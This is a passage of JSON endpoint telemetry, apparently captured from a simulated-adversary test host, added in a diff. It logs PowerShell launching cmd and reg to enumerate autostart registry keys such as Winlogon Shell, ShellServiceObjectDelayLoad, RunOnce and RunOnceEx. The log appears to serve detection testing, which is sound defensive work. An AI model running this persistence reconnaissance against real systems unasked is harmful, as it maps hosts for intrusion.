"{42FC7E13-CB0B-5C05-0000-00108EB55001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6052, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312610000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6052, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312610000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" + }, + { + "event_type": "process", + "pid": 6052, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571312610000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" + }, + { + "event_type": "process", + "pid": 524, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571312610000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4072, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571312720000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4072, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312610000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4072, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312610000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4072, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312610000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4072, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312610000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4072, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312610000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}" + }, + { + "command_line": "reg query HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1980, + "ppid": 4072, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571312810000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 1980, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312770000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1980, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312770000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1980, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312770000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1980, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312770000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1980, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312770000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 1980, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312770000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 1980, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312770000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1980, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312770000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1980, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312770000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" + }, + { + "event_type": "process", + "pid": 1980, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571312770000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" + }, + { + "event_type": "process", + "pid": 4072, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571312920000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4248, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571312980000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4248, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312920000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4248, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312920000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4248, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312920000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4248, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312920000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4248, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312920000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}" + }, + { + "command_line": "reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5316, + "ppid": 4248, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571313060000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 5316, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312920000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5316, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312920000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5316, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313090000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5316, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313090000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5316, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313090000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 5316, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313090000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 5316, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313090000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5316, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313090000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5316, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313090000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" + }, + { + "event_type": "process", + "pid": 5316, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571313090000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" + }, + { + "event_type": "process", + "pid": 4248, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571313090000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7264, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571313220000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7264, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313090000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7264, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313240000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7264, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313240000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7264, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313240000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7264, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313240000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}" + }, + { + "command_line": "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1448, + "ppid": 7264, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571313340000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 1448, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313240000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1448, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313240000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1448, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313240000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1448, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313240000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1448, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313390000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 1448, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313390000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 1448, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313390000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1448, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313390000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1448, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313390000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" + }, + { + "event_type": "process", + "pid": 1448, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571313390000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" + }, + { + "event_type": "process", + "pid": 7264, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571313390000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7860, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571313530000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7860, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313390000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7860, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313390000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7860, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313550000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7860, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313550000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7860, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313550000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}" + }, + { + "command_line": "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4136, + "ppid": 7860, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571313640000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 4136, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313550000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4136, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313550000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4136, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313550000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4136, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313550000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4136, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313550000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 4136, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313550000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 4136, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313550000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4136, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313550000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4136, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313550000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" + }, + { + "event_type": "process", + "pid": 4136, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571313710000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" + }, + { + "event_type": "process", + "pid": 7860, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571313710000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 3952, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571313799984, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001021C05001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3952, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313710000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001021C05001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3952, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313710000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001021C05001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3952, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313710000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001021C05001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3952, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313710000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001021C05001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3952, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313710000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001021C05001}" + }, + { + "command_line": "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 360, + "ppid": 3952, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571313880000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-001021C05001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": 